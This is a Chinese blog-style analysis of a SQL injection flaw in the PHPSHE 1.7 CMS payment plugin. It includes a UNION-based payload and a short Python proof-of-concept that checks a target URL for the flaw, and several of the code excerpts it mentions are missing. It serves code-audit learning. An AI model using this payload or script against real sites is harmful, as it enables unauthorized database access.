PHPSHE 1.7前台SQL注入漏洞分析

此CMS  SQL注入漏洞产生原因为未将经过 addslashes() 函数过滤的数据使用单引号包裹，从而导致的SQL注入漏洞。接下来看漏洞详情：

首先查看phpshe下的common.php文件37~44行：

上述代码可以看到，将获取到的GET  POST 数据加上前缀'_g'，然后再看pe_stripslashes函数：

可以看到$_GET不为空的情况下，将字符串经过 stripslashes 函数去除反斜线。

然后在查看一下防止SQL注入的函数pe_dbhold：

　

可以看到此过滤是将字符串经过addslashes()函数过滤，然后要注入的话则有2种情况：

　　1、可控数据未经过单引号包裹　

　　2、宽字节注入

然后查看此文件：include/plugin/payment/alipay/pay.php第34~35行：

此处可以看到，将可控数据进过pe_dbhold函数过滤后引入order_table函数：

此函数是查看 $id 中有无 '_' 有的话取第一个元素，否则返回 'order'，此处可以看到次函数返回值可控，然后跟进 pe_select 函数：

此函数中 $table 变量可控，并且带入SQL语句之中并无单引号包裹，从而产生SQL注入。

由于order_table()函数返回值为 order_{$id_arr[0]}，所以需要在数据库中找到数据库名包含 'order_' 的表，发现有且只有一个表：pe_order_pay

于是构造payload：pay`+where+1=1+union+select+1,2,user(),4,5,6,7,8,9,10,11,12#_

此处放上漏洞POC：

import requests

url = input("please input url:")
pro1 = "http://"
pro2 = "https://"
if pro1 or pro2 in url:
	pass
else:
	print("please input the correct URL")
headers = {
	"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0",
	"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
	"Accept-Language":"n-US,en;q=0.5"

}
payload = url + "/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,1314520,4,5,6,7,8,9,10,11,12%23_"
response = requests.get(payload,headers)
creden = '1314520'
if creden in response.text:
	print("you can hack!!!")
	print("payload is : " + payload)
else:
	print("The website is secure")

该漏洞可用于初学代码审计，具体利用则异常鸡肋，由于过滤单引号，并且在payload中不能出现下划线，导致无法查出数据库中的大部分数据，不过权限够高的话，可以直接getshell。